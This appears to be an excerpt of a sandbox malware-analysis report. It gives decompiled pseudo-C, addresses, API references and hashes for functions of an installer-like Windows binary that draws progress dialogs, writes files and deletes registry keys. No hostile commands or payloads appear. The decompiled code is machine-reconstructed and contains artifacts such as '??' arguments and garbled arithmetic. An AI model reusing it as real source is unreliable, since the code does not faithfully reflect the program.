                                                    Uniqueness Score: -1.00%

                                                    Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x420efc;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x420efc = 0;
					return _t15;
				}
				if( *0x420efc != 0) {
					return E00406A71(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x42a26c) {
					if( *0x42a268 == 0) {
						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
						 *0x420efc = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x42a314 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056CA(0,  &_v132);
					}
				}
				return _t6;
			}







                                                    0x0040303d
                                                    0x0040303f
                                                    0x00403046
                                                    0x00403049
                                                    0x00403049
                                                    0x0040304f
                                                    0x00000000
                                                    0x0040304f
                                                    0x0040305d
                                                    0x00000000
                                                    0x00403060
                                                    0x00403067
                                                    0x00403073
                                                    0x0040307b
                                                    0x004030b9
                                                    0x004030c2
                                                    0x00000000
                                                    0x004030c7
                                                    0x00403084
                                                    0x00403095
                                                    0x00000000
                                                    0x004030a3
                                                    0x00403084
                                                    0x004030cf

                                                    APIs
                                                    • DestroyWindow.USER32(?,00000000), ref: 00403049
                                                    • GetTickCount.KERNEL32 ref: 00403067
                                                    • wsprintfW.USER32 ref: 00403095
                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                      • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                      • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                    • CreateDialogParamW.USER32 ref: 004030B9
                                                    • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                      • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                    • String ID: ... %d%%
                                                    • API String ID: 722711167-2449383134
                                                    • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                    • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                    • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                    • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00404F7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                    0x00404f8d
                                                    0x00404f9a
                                                    0x00404fa0
                                                    0x00404fde
                                                    0x00404fde
                                                    0x00404fed
                                                    0x00404ff4
                                                    0x00000000
                                                    0x00404ff6
                                                    0x00404fa2
                                                    0x00404fb1
                                                    0x00404fb9
                                                    0x00404fbc
                                                    0x00404fce
                                                    0x00404fd4
                                                    0x00404fdb
                                                    0x00000000
                                                    0x00404fdb
                                                    0x00000000

                                                    APIs
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                    • GetMessagePos.USER32 ref: 00404FA2
                                                    • ScreenToClient.USER32 ref: 00404FBC
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: Message$Send$ClientScreen
                                                    • String ID: f
                                                    • API String ID: 41195575-1993550816
                                                    • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                    • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                    • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                    • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a270 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                    0x00402fa3
                                                    0x00402fb1
                                                    0x00402fb7
                                                    0x00402fb7
                                                    0x00402fc5
                                                    0x00402fc7
                                                    0x00402fd3
                                                    0x00402fd8
                                                    0x00402fda
                                                    0x00402fda
                                                    0x00402fe5
                                                    0x00402ff5
                                                    0x00403007
                                                    0x00403007
                                                    0x0040300f

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                    • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                    • API String ID: 1451636040-1158693248
                                                    • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                    • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                    • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                    • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E00402950(void* __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FAE(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406133(_t55);
				_t29 = E00406158(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a274;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035F8(_t49);
							E004035E2(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                                    0x00402950
                                                    0x00402952
                                                    0x00402957
                                                    0x0040295c
                                                    0x0040295f
                                                    0x00402969
                                                    0x0040296d
                                                    0x0040296d
                                                    0x00402973
                                                    0x00402980
                                                    0x00402988
                                                    0x0040298b
                                                    0x00402997
                                                    0x0040299a
                                                    0x004029a0
                                                    0x004029ae
                                                    0x004029b3
                                                    0x004029b7
                                                    0x004029ba
                                                    0x004029c3
                                                    0x004029cf
                                                    0x004029d3
                                                    0x004029d6
                                                    0x004029e0
                                                    0x004029ff
                                                    0x004029e7
                                                    0x004029ec
                                                    0x004029f4
                                                    0x004029f7
                                                    0x004029fc
                                                    0x004029fc
                                                    0x00402a06
                                                    0x00402a06
                                                    0x00402a13
                                                    0x00402a19
                                                    0x00402a1f
                                                    0x00402a1f
                                                    0x004029b7
                                                    0x00402a33
                                                    0x00402a35
                                                    0x00402a35
                                                    0x00402a3f
                                                    0x00402a40
                                                    0x00402a44
                                                    0x00402a48
                                                    0x00402a4e
                                                    0x00402a4e
                                                    0x00402a55
                                                    0x004022f1
                                                    0x00402c2d
                                                    0x00402c39

                                                    APIs
                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                    • GlobalFree.KERNEL32 ref: 00402A06
                                                    • GlobalFree.KERNEL32 ref: 00402A19
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                    • String ID:
                                                    • API String ID: 2667972263-0
                                                    • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                    • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                    • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                    • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00404E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 77%
                                                    			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
			}



















                                                    0x00404e7a
                                                    0x00404e7f
                                                    0x00404e87
                                                    0x00404e88
                                                    0x00404e95
                                                    0x00404e9d
                                                    0x00404e9e
                                                    0x00404ea0
                                                    0x00404ea2
                                                    0x00404ea4
                                                    0x00404ea7
                                                    0x00404ea7
                                                    0x00404eae
                                                    0x00404eb4
                                                    0x00404eb4
                                                    0x00404ebb
                                                    0x00404ec2
                                                    0x00404ec5
                                                    0x00404ec8
                                                    0x00404ec8
                                                    0x00404ecc
                                                    0x00404edc
                                                    0x00404ede
                                                    0x00404ee1
                                                    0x00404e8a
                                                    0x00404e8a
                                                    0x00404e91
                                                    0x00404e91
                                                    0x00404ee9
                                                    0x00404ef4
                                                    0x00404f0a
                                                    0x00404f1b
                                                    0x00404f37

                                                    APIs
                                                    • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                    • wsprintfW.USER32 ref: 00404F1B
                                                    • SetDlgItemTextW.USER32 ref: 00404F2E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: ItemTextlstrlenwsprintf
                                                    • String ID: %u.%u%s%s$H7B
                                                    • API String ID: 3540041739-107966168
                                                    • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                    • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                    • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                    • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 48%
                                                    			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A35(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                    0x00402eb4
                                                    0x00402ebd
                                                    0x00402ec6
                                                    0x00402ed2
                                                    0x00402edb
                                                    0x00402ee5
                                                    0x00402f0a
                                                    0x00402f10
                                                    0x00402f15
                                                    0x00402f16
                                                    0x00402f46
                                                    0x00402f1f
                                                    0x00402f21
                                                    0x00402f71
                                                    0x00402f74
                                                    0x00000000
                                                    0x00402f7a
                                                    0x00402f30
                                                    0x00402f35
                                                    0x00402f37
                                                    0x00000000
                                                    0x00000000
                                                    0x00402f3f
                                                    0x00402f44
                                                    0x00402f45
                                                    0x00402f45
                                                    0x00402f52
                                                    0x00402f5a
                                                    0x00402f61
                                                    0x00000000
                                                    0x00402f8a
                                                    0x00000000
                                                    0x00402f69
                                                    0x00402ef5
                                                    0x00402f08
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00402f08
                                                    0x00402f90

                                                    APIs
                                                    • RegEnumValueW.ADVAPI32 ref: 00402EFD
                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: CloseEnum$DeleteValue
                                                    • String ID:
                                                    • API String ID: 1354259210-0
                                                    • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                    • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                    • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                    • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 77%
                                                    			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                    0x00401d81
                                                    0x00401d85
                                                    0x00401d9a
                                                    0x00401d87
                                                    0x00401d89
                                                    0x00401d8f
                                                    0x00401d8f
                                                    0x00401da0
                                                    0x00401da3
                                                    0x00401dad
                                                    0x00401db0
                                                    0x00401db8
                                                    0x00401dc9
                                                    0x00401dcc
                                                    0x00401dd7
                                                    0x00401dce
                                                    0x00401dd0
                                                    0x00401dd0
                                                    0x00401ddb
                                                    0x00401de5
                                                    0x00401e0c
                                                    0x00401e1b
                                                    0x00401e29
                                                    0x00401e31
                                                    0x00401e39
                                                    0x00401e39
                                                    0x00401e42
                                                    0x00401e48
                                                    0x00402ba4
                                                    0x00402ba4
                                                    0x00402c2d
                                                    0x00402c39

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                    • String ID:
                                                    • API String ID: 1849352358-0
                                                    • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
